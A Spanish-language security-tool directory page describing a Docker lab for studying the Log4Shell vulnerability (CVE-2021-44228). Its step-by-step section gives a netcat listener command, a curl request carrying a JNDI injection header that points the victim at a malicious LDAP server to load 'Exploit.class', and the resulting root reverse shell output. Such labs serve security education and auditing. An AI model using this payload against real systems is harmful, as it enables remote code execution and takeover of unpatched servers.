Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mi-laboratorio-log4shell — Laboratorio automatizado Plug & Play en Docker para auditar y estudiar la vulnerabilidad Log4Shell (CVE-2021-44228) | Kitploit
Herramientas/GitHubGitHub/mafo-sec/mi-laboratorio-log4shell
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubmafo-sec/mi-laboratorio-log4shell

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

mi-laboratorio-log4shell

Laboratorio automatizado Plug & Play en Docker para auditar y estudiar la vulnerabilidad Log4Shell (CVE-2021-44228)

Ver Repositorio
hace 3 mesesAún no revisado

🚀 Laboratorio Automatizado Log4Shell (CVE-2021-44228) Plug & Play

Un laboratorio de investigación de seguridad automatizado, de un solo comando, diseñado para demostrar y auditar la vulnerabilidad de Ejecución Remota de Código (Log4Shell (CVE-2021-44228)).

Este proyecto consolida todos los componentes necesarios (aplicación vulnerable, servidor malicioso de referencia LDAP y herramientas del atacante) en una infraestructura de red unificada y aislada mediante Docker Compose.


⚙️ Características Clave

  • 100% Plug & Play: Sin configuración manual de IP, edición de archivos .env ni alineación de red. Todo se resuelve automáticamente mediante el DNS interno de Docker.
  • Compatibilidad Bytecode: El código de explotación se compila automáticamente de forma cruzada para forzar la compatibilidad con la arquitectura de la antigua Máquina Virtual Java (JVM) de la víctima, eliminando los errores UnsupportedClassVersionError.
  • Despliegue Centralizado: Controlado completamente por una única capa de orquestación y un script gestor interactivo de Bash (configurar.sh) que automatiza el derribo de contenedores, la limpieza de caché y las reconstrucciones.

🏗️ Descripción General de la Arquitectura

El laboratorio crea una red puente aislada (red-log4shell) con tres actores clave:

  1. Víctima (web-vulnerable): Una aplicación web Spring Boot que utiliza una versión sin mitigar y vulnerable de Log4j (2.14.1) ejecutándose en Java 8u111.
  2. Servidor LDAP (ldap-malicioso): Impulsado por marshalsec para interceptar las solicitudes de búsqueda entrantes y redirigir dinámicamente a la víctima al payload del atacante.
  3. Atacante (kali-tools): Un contenedor personalizado de Kali Linux que aloja un servidor HTTP de Python para entregar el payload de explotación compilado (Exploit.class) y un listener de Netcat para capturar la reverse shell.

⚙️ Inicio Rápido

Para desplegar este laboratorio en cualquier máquina Linux con Docker instalado, ejecute los siguientes comandos en su terminal:

root@kitploit:~
# 1. Clone the repository
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git

# 2. Navigate to the project directory
cd mi-laboratorio-log4shell

# 3. Grant execution permissions to the script manager and launch the lab
chmod +x configurar.sh
./configurar.sh

🚀 Cómo Explotar (Paso a Paso)

Una vez que la infraestructura esté funcionando automáticamente mediante el script, siga estos pasos para disparar el exploit y capturar la reverse shell. Paso 1: Configurar el Listener de Netcat

Abra una nueva terminal en su máquina host (Ubuntu) y conéctese al contenedor del atacante para poner a Netcat en espera de conexiones entrantes: Bash

sudo docker exec -it kali-tools bash

Dentro del contenedor Kali, inicie el listener: Bash

nc -lvnp 4444

Verá el mensaje: listening on [any] 4444 ... Paso 2: Lanzar el Vector de Ataque

Abra otra terminal separada en su máquina host y envíe la cadena de inyección JNDI maliciosa incrustada dentro de la cabecera X-Api-Version: Bash

curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'

Paso 3: Verificar la Reverse Shell

Vuelva a su terminal de Netcat. Debería ver una conexión activa. Ahora puede ejecutar comandos como root dentro del servidor víctima: Bash

connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164 whoami root


⚠️ Aviso Legal

Este repositorio se crea estrictamente con fines educativos, de investigación de seguridad y auditoría académica autorizada. Nunca ejecute estas herramientas o infraestructura de ataque sin autorización previa y por escrito de los propietarios de la infraestructura.

Descargar herramienta